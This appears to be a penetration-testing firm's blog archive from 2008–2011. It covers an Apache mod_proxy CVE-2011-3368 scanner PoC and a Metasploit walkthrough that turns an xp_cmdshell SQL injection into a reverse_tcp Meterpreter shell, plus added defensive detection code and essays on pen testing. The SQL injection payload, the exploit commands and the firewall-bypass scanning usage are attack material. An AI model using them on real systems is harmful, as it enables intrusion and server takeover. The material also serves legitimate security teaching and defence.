Posts Tagged ‘Penetration Testing’
CVE-2011-3368 PoC - Apache Proxy Scanner
Monday, October 10th, 2011
A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content on the DMZ network behind a reverse proxy:
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
SECFORCE has developed a proof of concept for this vulnerability, available for download from the security tools section of our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to port scan the web server and the hosts behind it through the Apache proxy functionality, thereby bypassing the firewall.
The following output shows the usage of the tool:
python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos
http://www.secforce.co.uk
usage():
python apache_scan.py [options]
[options]
-r: Remote Apache host
-p: Remote Apache port (default is 80)
-u: URL on the remote web server (default is /)
-d: Host in the DMZ (default is 127.0.0.1)
-e: Port in the DMZ (enables 'single port scan')
-g: GET request to the host in the DMZ (default is /)
-h: Help page
examples:
- Port scan of the remote host
python apache_scan.py -r www.example.com -u /img/test.gif
- Port scan of a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local
- Retrieve a resource from a host in the DMZ
python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html
The tool can be used to perform a port scan of the target host in the following way:
python apache_proxy_scanner.py -r <target> -u <uri>
The following screenshot shows the result of the command above:
[Image: Apache proxy port scan results]
The script can also be used to perform a bounce scan of a host in the DMZ or on the Internet:
python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d internalhost
python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d www.example.com
apache_proxy_scanner reports each port on the internal or external host as open, filtered or closed.
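Two checks a defender can run for this issue, written as an added Python example that is not part of SECFORCE's tool or of the original post. The first audits RewriteRule and ProxyPassMatch lines for the configuration shape the Apache advisory for CVE-2011-3368 describes as vulnerable: a substitution in which the backreference follows the backend host directly (http://host$1) instead of being separated by a slash (http://host/$1), so that a request target beginning with @ turns the intended host into the userinfo part of the proxied URL. The second scans access-log lines for request targets that, once percent-decoded, are not origin-form, asterisk-form or absolute-form. All configuration lines, hosts and log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed reverse-proxy configuration lines (hypothetical backends).
# Lines 1 and 3 glue the matched request straight onto the host; lines 2
# and 4 insert the slash that keeps the request inside the path.
SAMPLE_CONFIG = """\
RewriteRule ^(.*) http://10.0.0.5$1 [P]
RewriteRule ^/(.*) http://10.0.0.5/$1 [P]
ProxyPassMatch ^(.*) http://10.0.0.6:8080$1
ProxyPassMatch ^/(.*) http://10.0.0.6:8080/$1
"""

CONFIG_RE = re.compile(r"^\s*(RewriteRule|ProxyPassMatch)\s+(\S+)\s+(\S+)")
# scheme://host[:port] immediately followed by a backreference, no '/' between
UNSAFE_SUBST = re.compile(r"^https?://[^/\s]+\$\d")


def unsafe_proxy_rules(config_text):
    """Return (line number, directive, substitution) for rules whose
    substitution lacks a slash between the backend host and the backreference."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        m = CONFIG_RE.match(line)
        if m and UNSAFE_SUBST.match(m.group(3)):
            findings.append((lineno, m.group(1), m.group(3)))
    return findings


# Constructed access-log lines in Apache "combined" format (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2011:10:00:01 +0100] "GET /img/test.gif HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2011:10:00:02 +0100] "GET @internalhost.local:8080/accounts/index.html HTTP/1.0" 200 1043 "-" "python-urllib"
203.0.113.5 - - [10/Oct/2011:10:00:03 +0100] "GET %40internalhost.local:22/ HTTP/1.0" 400 0 "-" "python-urllib"
198.51.100.9 - - [10/Oct/2011:10:00:04 +0100] "OPTIONS * HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)


def suspicious_targets(log_text):
    """Return (client ip, raw target) for requests whose target, once
    percent-decoded, is neither origin-form (/path), asterisk-form (*)
    nor absolute-form (scheme://...). A target starting with '@' falls here."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m.group("target"))
        if decoded.startswith("/") or decoded == "*" or re.match(r"^[a-z][a-z0-9+.-]*://", decoded, re.I):
            continue
        hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for lineno, directive, subst in unsafe_proxy_rules(SAMPLE_CONFIG):
        print(f"config line {lineno}: {directive} substitution {subst!r} needs a '/' before the backreference")
    for ip, target in suspicious_targets(SAMPLE_ACCESS_LOG):
        print(f"{ip} sent non-path request target {target!r}")
```

The configuration check is the one worth automating across a fleet: the advisory's remediation is exactly the slash between host and backreference, and the regex accepts both http and https backends with or without a port. The log check is a coarse indicator; the decoding step matters because Apache applies rewrite rules to the decoded path, so a percent-encoded @ reaches mod_proxy in the same shape as a literal one.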
Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE
Posted in Penetration Testing, Tools, Vulnerabilities
SECFORCE is now CREST certified
Monday, July 25th, 2011
As part of the SECFORCE commitment to providing high quality services, SECFORCE has now achieved CREST certification. This further complements our existing methodology and work ethic.
SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe, with the ability to demonstrate the expertise and professionalism needed to ensure clients are fully satisfied.
[Image: CREST Penetration Testing]
“CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to the security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrate that the processes they utilise for testing are sound, that they have adopted industry best practice in their approach to testing and that they handle sensitive client information in an appropriate manner.”
Ian Glover, President of CREST
The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship.
“We are really pleased that CREST certification has been achieved and view this as an important step forward in the continued enhancement of our service delivery.”
Rodrigo Marcos, Technical Services Director
For more information about our CREST assessments, and to discover how we can benefit your organisation, please visit our CREST penetration testing page.
Tags: CREST, CREST security, penetration test, Penetration Testing, SECFORCE
Posted in CREST, Penetration Testing, SECFORCE
GUI manipulation and penetration testing
Friday, July 15th, 2011
Whilst in the web application development world it is by now well understood that “you should never trust data from the client side”, this is not always the case for local applications.
In web environments any restriction enforced on the client side can easily be bypassed with a web proxy. Security mechanisms enforced in desktop applications can sometimes be manipulated in the same way to perform unauthorised actions.
During a recent penetration test we were asked to assess the security of a desktop application. GUI manipulation was used to conduct a number of attacks.
The tool of choice for this particular attack was “DARKER’s Enabler”:
[Image: Denabler used for GUI manipulation]
DARKER’s Enabler is a tool that can show hidden controls and enable disabled ones in Windows applications.
The application under test had a number of disabled fields that needed to be modified for the purposes of the penetration test. Specifically, the “Encrypt” checkbox needed to be unchecked, but the application showed the field disabled:
[Image: Original application window]
With Denabler we dragged and dropped the red square onto the target application in order to identify the window handle of the field, and then enabled it:
[Image: Denabler in action]
This enabled the field and allowed the penetration testers to disable encryption in the application, which proved vital to the outcome of the penetration test:
[Image: Window after enabling the fields]
As shown above, GUI manipulation can lead to unwanted consequences. A disabled or hidden control is not a security boundary, so extra caution needs to be exercised during the design and development process to minimise the risk of GUI manipulation.
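The design lesson from the “Encrypt” checkbox, as an added Python example that is not code from the post or from the application under test: the weak design lets the backend treat the checkbox state as authoritative, so once a GUI tool re-enables the control the transfer goes out in plaintext; the hardened design derives the mode from a server-side policy and treats a client flag that contradicts a mandatory control as a tampering indicator. The TransferPolicy, TransferRequest and AuditLog types are hypothetical and exist only for this example.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class TransferPolicy:
    """Hypothetical server-side policy: is encryption of outgoing records mandatory?"""
    encryption_required: bool = True


@dataclass
class TransferRequest:
    """What the desktop client submits; 'encrypt' mirrors the checkbox state,
    which a GUI tool can flip regardless of whether the control was greyed out."""
    record_id: int
    encrypt: bool


@dataclass
class AuditLog:
    """Constructed sink for security events the backend wants an operator to see."""
    events: list = field(default_factory=list)


class PolicyViolation(Exception):
    pass


def transfer_trusting_client(req):
    """Weak design: the only thing between the user and a plaintext transfer is
    a disabled checkbox. The backend honours whatever value arrives."""
    return {"record_id": req.record_id, "mode": "encrypted" if req.encrypt else "plaintext"}


def transfer_enforcing_policy(req, policy, audit):
    """Hardened design: the backend decides from its own policy. A request that
    opts out of a mandatory control cannot come from the shipped UI, so it is
    refused and recorded rather than silently honoured."""
    if policy.encryption_required and not req.encrypt:
        audit.events.append(
            f"record {req.record_id}: client requested plaintext transfer against policy"
        )
        raise PolicyViolation("encryption is mandatory for this transfer")
    mode = "encrypted" if (policy.encryption_required or req.encrypt) else "plaintext"
    return {"record_id": req.record_id, "mode": mode}


def try_transfer(req, policy, audit):
    """Convenience wrapper that returns the outcome instead of raising."""
    try:
        return transfer_enforcing_policy(req, policy, audit)
    except PolicyViolation as exc:
        return {"record_id": req.record_id, "error": str(exc)}


if __name__ == "__main__":
    tampered = TransferRequest(record_id=42, encrypt=False)  # checkbox force-enabled and unticked
    print("weak design:    ", transfer_trusting_client(tampered))
    log = AuditLog()
    print("hardened design:", try_transfer(tampered, TransferPolicy(), log))
    print("audit events:   ", log.events)
```

Refusing rather than quietly re-encrypting is a deliberate choice: a silent fix-up hides the fact that the client is not behaving like the shipped UI, which is precisely the signal a defender wants logged.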
Tags: application manipulation, application penetration testing, application security, Denabler, desktop security, GUI, gui manipulation, gui penetration test, Penetration Testing
Posted in Penetration Testing, Tools
SECFORCE invited to present at Athcon
Saturday, June 18th, 2011
SECFORCE was invited to present at the AthCon conference, held in Athens on 2nd and 3rd June 2011.
AthCon is an annual IT security conference that takes place in Athens, Greece, designed to give a technical insight into the world of IT security: a realistic, practical view of current and evolving threats and security trends, presented by top international security experts.
SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.
The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.
You can download the slides from the talk from our security research area.
Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations
Posted in Penetration Testing, SECFORCE, Tools
Exploiting SQL injection vulnerabilities with Metasploit
Thursday, January 27th, 2011
In this post we are going to show how to exploit a SQL injection vulnerability in a web application with a Microsoft SQL Server backend where xp_cmdshell is available to the attacker.
Suppose that during a penetration test of a web application it is identified that the application is vulnerable to SQL injection and that the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell 'ping 192.168.1.64';--
If the request shown above is successful then arbitrary commands can be executed on the host. At this point there are a number of options that would allow the tester to fully compromise the server, and there are public tools that can automate the takeover process. This post covers the use of a Metasploit module.
The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute Meterpreter, one of the payloads that offers the most flexibility to the penetration tester.
It is necessary to specify the exact point at which the SQL injection vulnerability is located. We do that by setting the GET_PATH variable to the vulnerable URL with an [SQLi] token at the injection point; the token marks where the payload will be inserted. The rest of the exploitation process is the same as for any other vulnerability. This is the exploitation based on the URL shown above:
msf > use windows/mssql/mssql_payload_sqli
msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66
msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64
msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80
msf exploit(mssql_payload_sqli) > exploit
After exploitation the attacker will get a Meterpreter shell.
[Image: SQL injection exploitation with Metasploit]
If you want to use this code you can download it from the SECFORCE security tools repository.
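The defensive side of the same request, as an added Python example that is not code from the post, from Metasploit or from the application shown: the string-built query that lets the stacked exec run, its validated and parameterised replacement, and a detector that flags the attempt in web server logs. SQLite stands in for SQL Server (the concatenation defect is identical, only the stored procedure differs), the log lines follow an IIS W3C field order chosen for the example, and all hosts, requests and table contents are constructed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


# ---- The query defect and its fix (SQLite stands in for SQL Server) ----
def make_db():
    """Constructed product table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return conn


def product_query_vulnerable(raw_id):
    """The defect behind showproduct.asp?id=...: the parameter is pasted into the
    statement, so ';exec ...' after the number becomes a second statement."""
    return "SELECT name FROM products WHERE id = " + raw_id


def is_valid_id(raw_id):
    """Allow-list: a product id is one to nine decimal digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None


def lookup_product_hardened(conn, raw_id):
    """Validate first, then bind the value as a parameter so the driver can never
    interpret it as SQL text, whatever characters it contains."""
    if not is_valid_id(raw_id):
        raise ValueError("invalid product id")
    row = conn.execute("SELECT name FROM products WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


# ---- Spotting the attempt in web server logs ----
# Constructed IIS-style W3C log; the field order is declared in the #Fields line.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-01-27 10:00:01 192.168.1.66 GET /showproduct.asp id=1 192.168.1.64 200
2011-01-27 10:00:05 192.168.1.66 GET /showproduct.asp id=1;exec+master..xp_cmdshell+'ping+192.168.1.64';-- 192.168.1.64 200
2011-01-27 10:00:09 192.168.1.66 GET /showproduct.asp id=1%3Bexec%20master..xp_cmdshell%20%27ping%20192.168.1.64%27%3B-- 192.168.1.64 500
2011-01-27 10:00:12 192.168.1.66 GET /search.asp q=exec+summary 192.168.1.70 200
"""

STACKED_EXEC = re.compile(r";\s*exec\b", re.IGNORECASE)
XP_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)


def flag_xp_cmdshell_requests(log_text):
    """Return (client ip, uri stem, decoded query) for requests carrying a stacked
    EXEC of xp_cmdshell. Decoding first catches the percent-encoded variant."""
    hits, fields = [], None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        query = unquote_plus(rec.get("cs-uri-query", ""))
        if STACKED_EXEC.search(query) and XP_CMDSHELL.search(query):
            hits.append((rec["c-ip"], rec["cs-uri-stem"], query))
    return hits


if __name__ == "__main__":
    conn = make_db()
    print("hardened lookup of id 1:", lookup_product_hardened(conn, "1"))
    for ip, stem, query in flag_xp_cmdshell_requests(SAMPLE_IIS_LOG):
        print(f"{ip} -> {stem}: {query}")
```

The allow-list check is what makes the fix complete: parameter binding alone stops the stacked query, but rejecting anything that is not a plain integer also keeps the request out of the error path that the `500` in the sample log represents. The log detector is narrow by design; it looks for the specific pairing the post uses (a statement separator followed by exec, and xp_cmdshell) rather than a generic SQL keyword list, which keeps false positives on ordinary query strings low.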
Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection
Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection
Metasploit and SQL injection
Monday, January 17th, 2011
SECFORCE has released a set of scripts that extend Metasploit's functionality for exploiting SQL injection vulnerabilities. They are particularly useful in two scenarios:
- An attacker has achieved command execution on a database via SQL injection, but wants all of the functionality offered by Metasploit.
- The attacker identifies that the backend SQL Server is vulnerable to MS09-004 but has no credentials or direct access to the database.
Tags: metasploit, MS09004, Penetration Testing, sql injection, Tools
Posted in Penetration Testing, SECFORCE, Tools
SECFORCE has co-authored the book “SQL Injection Attacks and Defense”
Tuesday, March 31st, 2009
SECFORCE has co-authored a book fully dedicated to SQL injection attacks, published by Syngress. The book targets developers, penetration testers and security professionals. It is entirely dedicated to SQL injection attacks and defence, and is a standalone resource with all the necessary information about the topic.

SQL injection is one of the most devastating vulnerabilities affecting web applications. This book provides penetration testing professionals with all the information needed to discover and exploit this kind of vulnerability.
Tags: book, penetration test, Penetration Testing, sql injection, SQL injection Attacks and Defense
Posted in Penetration Testing, SECFORCE, Security Books
Penetration testing - service or commodity
Monday, February 23rd, 2009
We face this kind of issue every day. There are two different approaches to web application penetration tests:
- An increasing number of companies buy automatic web scanners, run them, generate some results and put them in a report-shaped tin, ready to go to the client. No human interaction with the application is needed.
- Other companies allocate X days of a highly skilled consultant to assess the security of your web application. Among many other tests the consultant will also run automatic web scanners, but that is only scratching the surface of a real penetration test. The consultant will use all of his or her experience to analyse many other aspects of the application.
Penetration testing is all about assurance. In the first case the client will get some useful results, no doubt about it, but what level of assurance is it going to get? The report will cover the vulnerabilities discovered by XYZ software. Is that enough? I don’t think so, but that is for the client to decide. There is no question that the report will be incomplete and many issues will be missed.
In the second scenario the client gets the assurance that the results are the work of a motivated attacker focused on the application's security for X days. Is that enough? Again, it is up to the client to decide, but in my opinion it gets much closer to an acceptable level of assurance.
It all depends on what you want to be protected against. The decision is yours.
Tags: information security assurance, pentest, penetration test, Penetration Testing
Posted in Penetration Testing, Risk Management
Advantages of penetration testing
Wednesday, January 7th, 2009
Many times we are asked: what are the advantages of penetration testing? Why should I conduct a penetration test in my business?
If you find yourself wondering whether or not you should conduct a penetration test, then you should try to answer these questions:
- Is my system secure?
- How do I know it is secure?
- What are the consequences if someone breaks into it?
We often hear people answer these questions by saying “Yes, it is secure because it was designed with security in mind”. However, penetration testing does not test the design of your solution but its real implementation.
We have found many good designs poorly implemented. Too many times the theory is too distant from the real thing.
You may also answer “I don’t know if it is secure or not, but I guess no one is going to attempt to break into it”. There are many different motivations for attacking a system, and the only way of ensuring that the security of your system is not going to be compromised is by securing it.
The advantage of penetration testing is that it gives you very accurate information about the real security posture of your system.
Only if you answered “None” to the third question should you not consider investing your resources in a penetration test.
Tags: advantages, penetration test, Penetration Testing, system security
Posted in Penetration Testing
Why penetration test? Firewall is not secure enough?
Tuesday, December 9th, 2008
A few days ago someone visited our website after searching in Google for “why penetration test? firewall is not secure enough?”. We are going to dedicate this post to just that topic.
A firewall is a device connected to two different networks, with a set of rules that determines what traffic may pass from one network to the other and vice versa. That simple. For example, a recommended configuration for a firewall protecting a web server is to filter all inbound and outbound traffic by default, allowing only inbound traffic to your web server port (TCP/80).
[Image: Firewall protecting web server at the network layer]
No doubt this is a good configuration that will protect the web server from many attacks. The firewall filters network access to many services, but the question is “why penetration test? firewall is not secure enough?”. Well, the answer is “no”: with just a firewall the above environment is not secure enough. A firewall is always going to allow some traffic; otherwise it would be better to remove the firewall and keep both networks disconnected.
In the configuration above the firewall allows connectivity to the web server, so an attacker targeting the website has full network access to it. The firewall does very little to protect the web application itself.
So back to the question, “why penetration testing?”. Penetration testing is a method of assessing the security of a system or network by emulating a real attack scenario, whereby a security consultant assumes the role of a motivated but non-destructive ‘hacker’. In the scenario above a penetration test will highlight any misconfiguration of the firewall and, more importantly in this case, will identify any vulnerability affecting your website that could be exploited by remote attackers.
In summary, a firewall is a great security tool that can protect your infrastructure from some threats, but it certainly cannot protect you from everything. Additionally, penetration testing can be used to gain assurance that your systems and applications are secure.
Tags: firewall, penetration test, Penetration Testing, web server security
Posted in Penetration Testing